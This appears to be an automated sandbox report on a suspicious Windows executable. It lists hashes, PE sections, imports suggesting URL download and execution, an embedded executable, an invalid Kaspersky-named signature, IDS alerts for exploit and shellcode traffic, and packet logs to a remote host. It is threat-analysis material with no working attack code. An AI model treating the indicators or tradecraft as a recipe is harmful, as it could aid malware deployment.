SSDEEP:	6144:eIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNSdwBCswSbw:zXD94+WlLZMM6YFHM+w
MD5:	FC5B26AEB54FE0AE0FF4C595C2491F14
SHA1:	60432BE62D277C404DB5450EDB0F30743A66A491
SHA-256:	05CE2000E19950DECD5A899158D43751C90A860A86423F81A9409E0DAFC166EC
SHA-512:	D88E3F3B17E0560172E765F6A84D8F4EA1B1C4121EC5D92D033ECC65231A74533E908CEF12554454D271D52106F7AAEEBF7E1F56E4A33658E2FEE28A6D17A1B2
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.o0................................................................................................................................................................................................................................................................................................................................................./+&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.606058719040755
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	LisectAVT_2403002B_246.exe
File size:	344'224 bytes
MD5:	8b5eb95f4a065ebf2719fe29321ca7ff
SHA1:	7eca9aca802512fe345f55bb5aa969f384f3e934
SHA256:	3754d6f495a00c1b11dc4da5a975d3876303071f3238307e4225e0ce392c02c5
SHA512:	ae1acc254b4bc880f02f407f1a18c7566ab08e42e525ba214d758d49b11e4e93f69a1880c4dc8dc09e9dabe6aa79c70fe640873b7d165f1c17b9e59968c250a3
SSDEEP:	6144:B582blhfS3Cyp7Slb8/njrtolAOrNhkEMKBytnf:382TfS3Oqql+EMKByhf
TLSH:	3E749E00B5808433D8B3193208F99B795A3EBD600F1599DB73D87B7E8F746D1AA3166B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~.............................................................................t.......t...............t.......Rich...........

File Icon


Icon Hash:	78d8ac7c1ec6fc78

Static PE Info

General

Entrypoint:	0x409efa
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65FA7479 [Wed Mar 20 05:30:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	420798ab814743e3a29327a2a50ae1f1

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Assured ID Code Signing CA-1, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	09/06/2020 01:00:00 14/06/2023 13:00:00
Subject Chain	CN=AO Kaspersky Lab, O=AO Kaspersky Lab, L=Moscow, C=RU
Version:	3
Thumbprint MD5:	771BAFE44ED364A093759572C5926BC0
Thumbprint SHA-1:	514827B465A83ECF22BAFCAC6A8F84C2EC5E561F
Thumbprint SHA-256:	96DE6F242505DE176BF6C750CC61E0B3E1795A8ABF10BF5E88C66F750A39913F
Serial:	067CE8A9F2E02AC7D49304F85E9474E1

Entrypoint Preview

Instruction
call 00007F2D6D3033AAh
jmp 00007F2D6D302DC9h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F2D6D302F6Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F2D6D302F5Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F2D6D302F5Eh
add edx, 28h
cmp edx, esi
jne 00007F2D6D302F3Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F2D6D302F4Bh
push esi
call 00007F2D6D30385Dh
test eax, eax
je 00007F2D6D302F72h
mov eax, dword ptr fs:[00000018h]
mov esi, 00438230h
mov edx, dword ptr [eax+04h]
jmp 00007F2D6D302F56h
cmp edx, eax
je 00007F2D6D302F62h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F2D6D302F42h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F2D6D302F59h
mov byte ptr [00438234h], 00000001h
call 00007F2D6D30364Bh
call 00007F2D6D30586Fh
test al, al
jne 00007F2D6D302F56h
xor al, al
pop ebp
ret
call 00007F2D6D30E3C6h
test al, al
jne 00007F2D6D302F5Ch
push 00000000h
call 00007F2D6D305876h
pop ecx
jmp 00007F2D6D302F3Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [00438235h], 00000000h
je 00007F2D6D302F56h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x35e20	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x39000	0x151d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4d400	0x6ca0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4f000	0x1d20	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x33a04	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x33a40	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x28000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x26758	0x26800	d6a1d92cbf1e0c6c1fffb2d4be06fd94	False	0.5531846083603896	data	6.556357890001363	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x28000	0xe6bc	0xe800	b2d4ee7fa662580330b5a255d7b4d580	False	0.5104391163793104	data	5.5427476886139	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x37000	0x1d6c	0x1000	2f8b31a80610d16b5baedfce4072667f	False	0.195068359375	DOS executable (block device driver)	3.1613628408255594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x39000	0x151d0	0x15200	4cadef8f465240978a23aa4f940feb1f	False	0.5139492418639053	data	5.955658626219142	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4f000	0x1d20	0x1e00	0840c4870df505269b78eec799efe991	False	0.7354166666666667	data	6.451435730887686	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
EXE	0x391a0	0x10800	PE32 executable (GUI) Intel 80386, for MS Windows	Chinese	China	0.5619229403409091
RT_ICON	0x499a0	0x528	Device independent bitmap graphic, 16 x 32 x 32, image size 1280	Chinese	China	0.5227272727272727
RT_ICON	0x49ec8	0x1428	Device independent bitmap graphic, 32 x 64 x 32, image size 5120	Chinese	China	0.4007751937984496
RT_ICON	0x4b2f0	0x2d28	Device independent bitmap graphic, 48 x 96 x 32, image size 11520	Chinese	China	0.30960207612456747
RT_GROUP_ICON	0x4e018	0x30	data	Chinese	China	0.8125
RT_MANIFEST	0x4e048	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
KERNEL32.dll	SetPriorityClass, VirtualFree, GetCurrentProcess, VirtualAlloc, SetThreadPriority, Sleep, GetCurrentThread, ExitProcess, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CloseHandle, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, SetEndOfFile
USER32.dll	ShowWindow
SHELL32.dll	SHChangeNotify, ShellExecuteA
WININET.dll	InternetCloseHandle, InternetOpenA, InternetReadFile, InternetOpenUrlA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T16:04:45.684505+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49737	20.114.59.183	192.168.2.4
2024-07-25T16:04:34.377932+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	443	49733	43.153.232.151	192.168.2.4
2024-07-25T16:05:24.036708+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49751	20.114.59.183	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 16:04:25.662312031 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:25.662405014 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:25.662481070 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:25.674767017 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:25.674808979 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.066837072 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.067012072 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.067965031 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.068043947 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.187007904 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.187052965 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.187390089 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.187452078 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.191566944 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.232506037 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.748414040 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.748440981 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.748667002 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.748713970 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.748759985 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.754385948 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.754497051 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.754527092 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.754565001 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.825040102 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.825135946 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.825175047 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.825345039 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.826272011 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.826302052 CEST	443	49731	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.826318979 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.826354980 CEST	49731	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.863008022 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.863044024 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:27.863110065 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.863382101 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:27.863390923 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.293867111 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.294111967 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.294881105 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.294904947 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.295104980 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.295110941 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.693865061 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.693893909 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.693988085 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.693988085 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.694006920 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.694134951 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.784308910 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.784342051 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.784521103 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.784539938 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.784583092 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.786803961 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.786912918 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.786921024 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.787087917 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.788852930 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.788924932 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.788932085 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.788975000 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.791373968 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.791441917 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.791448116 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.791659117 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.794011116 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.794078112 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.794094086 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.794136047 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.880669117 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.881314039 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.881340027 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.881438017 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.902029037 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.902051926 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.902240992 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.902261972 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.902335882 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.908512115 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.908530951 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.908612013 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.908642054 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.908828974 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.914551973 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.914572001 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.914741039 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:30.914758921 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:30.915172100 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.002741098 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.002767086 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.002926111 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.002947092 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.003062010 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.010837078 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.010859013 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.011003971 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.011030912 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.011075974 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.021532059 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.021552086 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.021684885 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.021708965 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.021750927 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.038341999 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.038368940 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.038445950 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.038461924 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.038501024 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.044538021 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.044563055 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.044631004 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.044646025 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.044687033 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.053754091 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.053778887 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.053842068 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.053857088 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.054105997 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.057238102 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.057296991 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.057307005 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.057410002 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.060714006 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.060808897 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.060817003 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.061078072 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.066504002 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.066513062 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.066576004 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.066590071 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.066628933 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.066628933 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.087593079 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.087618113 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.087702990 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.087730885 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.088166952 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.093432903 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.093456984 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.093538046 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.093554020 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.093617916 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.100231886 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.100277901 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.100389957 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.100389957 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.100409031 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.100682020 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.101366997 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.101444006 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.101464987 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.101538897 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.103503942 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.103585958 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.103594065 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.103662014 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.107757092 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.107784033 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.107850075 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.107863903 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.107965946 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.112078905 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.112127066 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.112174034 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.112195969 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.112231970 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.112231970 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.115511894 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.115551949 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.115619898 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.115619898 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.115633011 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.115967989 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.121350050 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.121396065 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.121433973 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.121433973 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.121450901 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.121505022 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.121505022 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.122809887 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.122915983 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.122926950 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.123028994 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.234709024 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.234863043 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.234913111 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.235168934 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.239403963 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.239516020 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.239546061 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.239718914 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.247710943 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.247746944 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.247812986 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.247833967 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.248368979 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.254982948 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.255013943 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.255075932 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.255090952 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.255167961 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.275506973 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.275547981 CEST	443	49732	43.153.232.151	192.168.2.4
Jul 25, 2024 16:04:31.275602102 CEST	49732	443	192.168.2.4	43.153.232.151
Jul 25, 2024 16:04:31.275614977 CEST	443	49732	43.153.232.151	192.168.2.4
